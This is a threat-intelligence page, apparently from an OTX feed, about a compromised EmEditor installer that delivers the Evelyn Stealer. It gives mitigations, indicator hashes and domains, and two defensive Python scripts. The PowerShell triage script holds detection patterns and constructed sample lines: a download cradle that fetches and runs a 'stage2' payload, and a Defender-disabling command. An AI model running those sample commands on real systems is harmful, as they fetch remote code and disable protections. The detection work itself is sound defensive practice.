
Watering Hole Attack Targets EmEditor Users With Information-Stealing Malware

Severity: Medium
Published: Fri Jan 23 2026 (01/23/2026, 11:47:40 UTC)
Source: AlienVault OTX General

Description

A watering hole attack compromised the EmEditor text editor installer to deliver multistage malware known as Evelyn Stealer. Discovered in late December 2025, the malware uses obfuscated PowerShell scripts and geofencing to selectively target victims, likely originating from Russian threat actors. It steals credentials, disables security features, collects system information, enables lateral movement, and exfiltrates data to a command-and-control server. The attack exploits the software supply chain, emphasizing the need for validating installer integrity and monitoring PowerShell activity. Endpoint telemetry preservation and enforcing least privilege are critical defenses. No CVSS score is assigned, but the attack poses a medium severity risk due to its impact and complexity. European organizations using EmEditor should be vigilant, especially those with critical data and extensive use of this editor. Mitigations include securing download infrastructure, enhanced monitoring, and incident response readiness.

AI-Powered Analysis

AI analysis last updated: 01/23/2026, 23:20:22 UTC

Technical Analysis

This threat is a watering hole attack against users of EmEditor, a widely used Windows text editor: the installer users download was compromised in a software supply chain attack discovered in late December 2025. The attackers replaced or modified the EmEditor installer so that running it deploys a multistage information stealer tracked as Evelyn Stealer. The malware is staged through obfuscated PowerShell scripts to evade detection and applies geofencing so that it executes only for victims in selected regions; the source attributes the campaign, as a likelihood rather than a confirmed finding, to Russian threat actors. Once running, it disables security features such as antivirus or endpoint detection and response tooling so that it can persist and avoid removal, collects detailed system information and credentials, supports lateral movement within the victim's network to expand its foothold, and exfiltrates the stolen data to a remote command-and-control (C2) server. In MITRE ATT&CK terms the pulse covers credential dumping (T1003.001), system information discovery (T1082), obfuscated files or information (T1027) and virtualization/sandbox evasion (T1497); the disabling of security tools that the analysis also describes maps to Impair Defenses (T1562.001), not T1497. The campaign is a textbook supply chain compromise, in which trusted software becomes the delivery vector. The pulse names no affected version range, so any EmEditor installer obtained during the campaign window should be treated as suspect until its hash and signature have been verified. The indicators listed below comprise thirteen file hashes (three MD5, seven SHA-1, three SHA-256) and four domains; three of the domains appear to be EmEditor lookalikes with country suffixes (emeditorde.com, emeditorgb.com, emeditorjp.com), the fourth is cachingdrive.com. Defensively, the incident underscores validating installer integrity, monitoring PowerShell usage, preserving endpoint telemetry for forensic analysis, and enforcing least privilege to limit what a compromised host can do. Software publishers should harden their download infrastructure and prepare incident response plans for supply chain compromise.

Potential Impact

For European organizations the risks are credential theft, unauthorized access, data exfiltration and disruption of business operations. Teams that rely on EmEditor for editing and development work may install the compromised software without noticing, and because the malware disables security tooling and supports lateral movement, a single infected workstation can grow into a broader compromise of data confidentiality and system integrity. Exfiltration to an external C2 server can mean loss of intellectual property, GDPR obligations (breach notification and potential fines) and reputational damage. Geofencing may restrict execution to chosen regions, but that offers European entities little comfort: the indicator list includes lookalike domains with German and British country suffixes (emeditorde.com, emeditorgb.com), and EmEditor has a global user base. The incident also illustrates how exposed software supply chains are, which matters to many European enterprises. The medium severity rating balances the effort the attack required against the serious consequences of a successful compromise; organizations in sectors with highly sensitive data, such as finance, government and critical infrastructure, face elevated risk.

Mitigation Recommendations

1. Verify the integrity of any EmEditor installer before running it: confirm the Authenticode signature is valid and chains to the expected publisher (Get-AuthenticodeSignature in PowerShell shows signer and status), compare the file hash with the value the vendor publishes where one is provided, and check it against the hashes listed under Indicators of Compromise.
2. Monitor PowerShell rather than relying on the execution policy, which is not a security boundary: enable Script Block Logging (Event ID 4104) and Module Logging, constrain PowerShell through AppLocker or WDAC (which places it in Constrained Language Mode), and alert on encoded commands, download cradles and obfuscated script blocks with your EDR.
3. Preserve endpoint telemetry and enable detailed logging (Sysmon or equivalent process, network and DNS events) so that an infection can be reconstructed during incident response.
4. Enforce least privilege for users and applications so that a compromised installation cannot disable security tooling or dump credentials with administrative rights.
5. Segment networks to contain lateral movement and isolate critical systems.
6. Require multi-factor authentication so that stolen credentials alone do not grant access.
7. Reinstall EmEditor from a clean, verified installer once the vendor confirms its download channel is trustworthy, and keep all other software patched.
8. For software publishers: lock down download infrastructure with strong access controls, monitor for unauthorized changes to published artifacts, and deliver releases through code signing and trusted repositories.
9. Develop and rehearse incident response plans that specifically cover supply chain compromise scenarios.
10. Educate users to download software only from official sources and to verify its authenticity before installing it.
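The PowerShell monitoring in item 2 needs something to alert on. The following is an added example written for this page (not detection logic from Trend Micro, AlienVault or the EmEditor project) that triages script text, such as the ScriptBlockText field of Event ID 4104 or a process command line, for the patterns the analysis describes: encoded commands, backtick-split tokens, base64 decoding, download cradles and Defender tampering. It also decodes -EncodedCommand payloads (base64 of UTF-16LE) and strips obfuscation backticks before matching, so I`E`X is seen as IEX. The indicator weights and thresholds are this editor's assumptions, and every sample block is constructed; none of it is Evelyn Stealer code.

```python
"""Triage PowerShell script blocks / command lines for obfuscation and
defence-tampering patterns. Added example: heuristics, weights and thresholds
are the editor's assumptions; all sample blocks are constructed."""
import base64
import math
import re
from collections import Counter

# Weighted indicators applied to the normalised text. Weights are illustrative.
INDICATORS = [
    ("encoded_command", 4, re.compile(r"-(?:e|en|enc|encodedcommand)\b\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("base64_decode", 3, re.compile(r"FromBase64String", re.I)),
    ("invoke_expression", 3, re.compile(r"\bIEX\b|Invoke-Expression", re.I)),
    ("download_cradle", 3, re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Start-BitsTransfer", re.I)),
    ("char_code_join", 3, re.compile(r"\[char\]\s*\d+|-join\s*\(", re.I)),
    ("format_operator", 2, re.compile(r"\{\d+\}[^\n]*-f\b", re.I)),
    ("defender_tamper", 5, re.compile(r"Set-MpPreference\s+-Disable\w+|Add-MpPreference\s+-Exclusion\w+", re.I)),
    ("long_base64_run", 2, re.compile(r"[A-Za-z0-9+/]{100,}={0,2}")),
]
# A backtick inside a token (I`E`X) is obfuscation; `n, `t and the other string
# escapes are legitimate, so they are excluded. Checked on the raw text only.
BACKTICK_IN_TOKEN = re.compile(r"[A-Za-z]`(?![0abefnrtuv])[A-Za-z]")
_STRAY_BACKTICK = re.compile(r"`(?![0abefnrtuv])")
_ENCODED_ARG = re.compile(r"-(?:e|en|enc|encodedcommand)\b\s+([A-Za-z0-9+/=]{20,})", re.I)

SUSPICIOUS_SCORE = 6      # review anything at or above this (assumed threshold)
ENTROPY_THRESHOLD = 5.0   # bits/char; readable scripts usually sit below 5, dense base64 above
ENTROPY_MIN_LENGTH = 200  # entropy is meaningless on very short blocks


def shannon_entropy(text: str) -> float:
    """Bits per character of the text."""
    if not text:
        return 0.0
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values())


def decode_encoded_commands(text: str) -> list[str]:
    """Recover the script behind every -EncodedCommand argument (base64 of UTF-16LE)."""
    decoded = []
    for blob in _ENCODED_ARG.findall(text):
        try:
            decoded.append(base64.b64decode(blob, validate=True).decode("utf-16-le"))
        except (ValueError, UnicodeDecodeError):
            continue  # not a real encoded command; the raw-text indicators still apply
    return decoded


def normalize(text: str) -> str:
    """Strip obfuscation backticks and append decoded -enc payloads, so the
    token patterns match what the engine will actually execute."""
    return "\n".join([_STRAY_BACKTICK.sub("", text), *decode_encoded_commands(text)])


def triage(text: str) -> dict:
    """Score one script block: indicators hit, total score, entropy, verdict."""
    hits = {}
    view = normalize(text)
    for name, weight, pattern in INDICATORS:
        if pattern.search(view):
            hits[name] = weight
    if BACKTICK_IN_TOKEN.search(text):
        hits["backtick_obfuscation"] = 3
    entropy = shannon_entropy(text)
    if len(text) >= ENTROPY_MIN_LENGTH and entropy >= ENTROPY_THRESHOLD:
        hits["high_entropy"] = 2
    score = sum(hits.values())
    return {"score": score, "suspicious": score >= SUSPICIOUS_SCORE,
            "indicators": sorted(hits), "entropy": round(entropy, 2)}


def scan_script_blocks(blocks: dict[str, str]) -> list[tuple[str, dict]]:
    """Triage a batch keyed by an identifier (e.g. ScriptBlockId); return the suspicious ones."""
    return [(key, result) for key, result in ((k, triage(t)) for k, t in blocks.items())
            if result["suspicious"]]


# Constructed samples. _INNER mimics a generic download cradle, not this campaign's code.
_INNER = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.10/stage2')"
_ENC_BLOB = base64.b64encode(_INNER.encode("utf-16-le")).decode()
_B64_BLOB = base64.b64encode(b"constructed placeholder payload " * 4).decode()

SAMPLE_BLOCKS = {
    "benign-archive": (
        "Get-ChildItem -Path C:\\Logs -Filter *.log | Where-Object { $_.Length -gt 1MB } | "
        "ForEach-Object { Compress-Archive -Path $_.FullName -DestinationPath \"$($_.FullName).zip\" }"
    ),
    "benign-escape": 'Write-Host "Backup finished`n"; Get-Date -Format o',
    "encoded-cradle": f"powershell.exe -nop -w hidden -enc {_ENC_BLOB}",
    "stager-tamper": (
        "Set-MpPreference -DisableRealtimeMonitoring $true\n"
        f"$d = [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('{_B64_BLOB}'))\n"
        "I`E`X (New-Object Net.WebClient).DownloadString('http://198.51.100.10/stage2')"
    ),
}

if __name__ == "__main__":
    for key, result in scan_script_blocks(SAMPLE_BLOCKS):
        print(key, result["score"], result["indicators"])
```

Feed it the ScriptBlockText of 4104 events (or Sysmon Event ID 1 command lines) and review everything that scores at or above the threshold; the two benign samples score zero, including the one that uses a legitimate `n escape, while both constructed malicious samples are flagged even though one hides its IEX behind -enc and the other behind backticks.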


Technical Details

Author
AlienVault
Tlp
white
References
https://www.trendmicro.com/en_us/research/26/a/watering-hole-attack-targets-emeditor-users.html
Adversary
null
Pulse Id
69735fdc6006a7c4a9748eb3
Threat Score
null

Indicators of Compromise

Hash

MD5
57bc24f923c92fc600c2ad47fe285074
6a4554509ce27efe5c6b8e58431f60d8
a27731876e769ff19e225700085967bf

SHA-1
65b0853abb656c6cc342d87b872fbe21482e9bae
81e1ccbd3b4ed5a7593cfba21315c65ad4635f73
826af8619430e7363e9eb3b2395b36cf6365b7bd
938325004e44ab1a65e948b4d07b05229309f630
a3ab5e58a9330dd673dec17777e5110bf3c9eba3
e5678fd66ac09205f55dc4fae9601185a76b2f50
ff78a86746bdcc6ed1390ff291a6c599e96e8487

SHA-256
3d1763b037e66bbde222125a21b23fc24abd76ebab40589748ac69e2f37c27fc
4bea333d3d2f2a32018cd6afe742c3b25bfcc6bfe8963179dad3940305b13c98
da59acc764bbd6b576bef6b1b9038f592ad4df0eed894b0fbd3931f733622a1a

Domain

cachingdrive.com
emeditorde.com
emeditorgb.com
emeditorjp.com
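To put these indicators to use, here is an added example (this editor's code, not part of the OTX pulse or the Trend Micro report) that hashes a downloaded installer with the three algorithms the list uses, matches the digests against the indicator set, does a positive check against a publisher-supplied SHA-256 where one exists, and scans resolver or Sysmon DNS log lines for the indicator domains, including subdomains such as www.emeditorde.com. The hash and domain values are copied from the page; the sample log lines and the expected hash in the test are constructed.

```python
"""Match the file-hash and domain indicators from this page against a local
file and DNS query logs. Added example: indicator values are copied from the
page; the sample log lines are constructed."""
import hashlib
import hmac
import re

ALGORITHMS = ("md5", "sha1", "sha256")

# File hashes from the page, grouped by algorithm (32 / 40 / 64 hex characters).
IOC_HASHES = {
    "md5": {
        "57bc24f923c92fc600c2ad47fe285074",
        "6a4554509ce27efe5c6b8e58431f60d8",
        "a27731876e769ff19e225700085967bf",
    },
    "sha1": {
        "65b0853abb656c6cc342d87b872fbe21482e9bae",
        "81e1ccbd3b4ed5a7593cfba21315c65ad4635f73",
        "826af8619430e7363e9eb3b2395b36cf6365b7bd",
        "938325004e44ab1a65e948b4d07b05229309f630",
        "a3ab5e58a9330dd673dec17777e5110bf3c9eba3",
        "e5678fd66ac09205f55dc4fae9601185a76b2f50",
        "ff78a86746bdcc6ed1390ff291a6c599e96e8487",
    },
    "sha256": {
        "3d1763b037e66bbde222125a21b23fc24abd76ebab40589748ac69e2f37c27fc",
        "4bea333d3d2f2a32018cd6afe742c3b25bfcc6bfe8963179dad3940305b13c98",
        "da59acc764bbd6b576bef6b1b9038f592ad4df0eed894b0fbd3931f733622a1a",
    },
}

# Domains from the page. A query for any label beneath them also counts.
IOC_DOMAINS = {"cachingdrive.com", "emeditorde.com", "emeditorgb.com", "emeditorjp.com"}


def hash_bytes(data: bytes) -> dict[str, str]:
    """Digest in-memory data with every algorithm the indicator list uses."""
    return {alg: hashlib.new(alg, data).hexdigest() for alg in ALGORITHMS}


def hash_file(path: str, chunk_size: int = 1 << 20) -> dict[str, str]:
    """Same as hash_bytes but streamed, since installers are large."""
    hashers = {alg: hashlib.new(alg) for alg in ALGORITHMS}
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            for h in hashers.values():
                h.update(chunk)
    return {alg: h.hexdigest() for alg, h in hashers.items()}


def match_hashes(digests: dict[str, str]) -> list[str]:
    """Return 'alg:digest' for every digest that is a known-bad indicator."""
    return [f"{alg}:{d.lower()}" for alg, d in digests.items()
            if alg in IOC_HASHES and d.lower() in IOC_HASHES[alg]]


def matches_expected(digests: dict[str, str], expected_sha256: str) -> bool:
    """Positive check against a hash the publisher provides (constant-time compare)."""
    return hmac.compare_digest(digests["sha256"].lower(), expected_sha256.strip().lower())


def domain_is_ioc(name: str) -> bool:
    """True for an indicator domain or any subdomain; 'notemeditorde.com' does not match."""
    n = name.lower().rstrip(".")
    return any(n == d or n.endswith("." + d) for d in IOC_DOMAINS)


# Queried name in a resolver log ("query: <name>"), a key=value log ("qname=<name>")
# or a Sysmon Event ID 22 record ("QueryName: <name>"). Adapt to your own log format.
_QNAME = re.compile(r"(?:query:\s*|qname=|QueryName:\s*)([A-Za-z0-9.-]+)", re.IGNORECASE)


def scan_dns_log(lines) -> list[tuple[int, str]]:
    """Return (line_number, domain) for every line that resolved an indicator domain."""
    hits = []
    for number, line in enumerate(lines, 1):
        m = _QNAME.search(line)
        if m and domain_is_ioc(m.group(1)):
            hits.append((number, m.group(1).lower().rstrip(".")))
    return hits


# Constructed sample log lines; timestamps and client addresses are invented.
SAMPLE_DNS_LOG = [
    "2026-01-05T09:12:01Z client 10.0.0.21 query: www.emeditorde.com A",
    "2026-01-05T09:12:02Z client 10.0.0.21 query: cachingdrive.com A",
    "2026-01-05T09:13:44Z client 10.0.0.35 query: updates.example.net A",
    "Sysmon EventID 22 QueryName: emeditorjp.com QueryStatus: 0",
]

if __name__ == "__main__":
    import sys
    for path in sys.argv[1:]:
        bad = match_hashes(hash_file(path))
        print(path, "KNOWN-BAD " + ", ".join(bad) if bad else "not in indicator list")
    for number, domain in scan_dns_log(SAMPLE_DNS_LOG):
        print(f"line {number}: query for indicator domain {domain}")
```

Run it with the installer path as an argument; a hash hit is conclusive, but a miss only means the file is not one of the thirteen samples listed here, so the Authenticode signature and publisher-provided hash in mitigation item 1 still need checking.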

Threat ID: 6973fed44623b1157c68862a

Added to database: 1/23/2026, 11:05:56 PM

Last enriched: 1/23/2026, 11:20:22 PM

Last updated: 1/24/2026, 7:35:45 AM
